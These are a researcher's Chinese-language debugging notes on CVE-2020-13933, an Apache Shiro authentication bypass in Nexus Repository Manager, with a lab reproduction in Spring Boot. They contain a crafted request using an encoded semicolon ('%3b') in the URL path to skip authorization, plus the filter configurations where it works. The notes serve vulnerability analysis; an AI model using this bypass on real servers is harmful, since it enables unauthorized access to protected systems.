参考:
- https://support.sonatype.com/hc/en-us/articles/360053556313-CVE-2020-13933-Nexus-Repository-Manger-2-3-Shiro-Authentication-Bypass
- https://issues.sonatype.org/browse/NEXUS-25086
- https://help.aliyun.com/noticelist/articleid/1060730690.html
- https://github.com/lyy289065406/CVE-2020-13933
- https://github.com/sonatype/nexus-public/compare/release-3.26.1-02…release-3.27.0-03
影响版本:
- Nexus Repository Manager 2 versions up to and including 2.14.18
- Nexus Repository Manager 3 versions up to and including 3.26.1
找diff,搜shiro关键词,发现nexus把shiro的版本修改了。
尝试调试:
首先尝试这个请求:
GET /nexus/service/siesta/capabilities/%3b0002abde1d29011e HTTP/1.1
Host: 192.168.85.129:8081
Connection: close
控制台出现这个log
jvm 1 | 2020-11-13 02:56:00,809-0800 WARN [qtp609773298-49] anonymous org.sonatype.nexus.plugins.siesta.AuthorizationExceptionMapper - (ID 4a182908-df0e-4fe9-8de7-650a9467a9ad) Response: [401] ErrorXO{id='4a182908-df0e-4fe9-8de7-650a9467a9ad', message='User is not permitted: nexus:capabilities:read'} mapped from org.apache.shiro.authz.AuthorizationException/User is not permitted: nexus:capabilities:read
于是找到这个异常org.apache.shiro.authz.AuthorizationException
被new的地方,先定位到jar包:
/d/repos/nexus-2.14.13-01-bundle/nexus-2.14.13-01
$ grep -rn "org.apache.shiro.authz.AuthorizationException" *
Binary file nexus/WEB-INF/lib/shiro-core-1.3.2.jar matches
于是去IDEA下断点:
果然再次请求的时候,在这里停下了,
然后开始分析调用栈:
环境搭建
参考:
- https://www.anquanke.com/post/id/216096
- https://www.anquanke.com/post/id/218270
https://github.com/l3yx/springboot-shiro.git
修改pom.xml中的shiro版本为1.5.3,然后修改path mapping:
// @GetMapping("/admin/page")
// public String admin() {
// return "admin page";
// }
@GetMapping("/admin/{name}")
public String admin(@PathVariable String name) {
return "admin page";
}
注意这里的GetMapping设置的path是
/admin/{name}
而不是
/admin/page
(这样的配置无法绕过)
需要知道的是ShiroConfig.java中有这样的配置:
map.put("/admin/*", "authc");
注意这里是/admin/*
而不是/admin/**。
在admin方法的return语句下断点。
进入到这里说明已经绕过了shiro的限制。
再次测试:
将配置设置为:
map.put("/admin/index/*", "authc");
然后GetMappings设置为:
/admin/index/{name}
依然可以绕过。
附两种不同的404页面(一个Spring的,一个Tomcat的)
而如果设置为:
map.put("/admin/index/**", "authc");
则使用/srpingboot-shiro-0.0.1-SNAPSHOT/admin/index/%3bpage
无法绕过。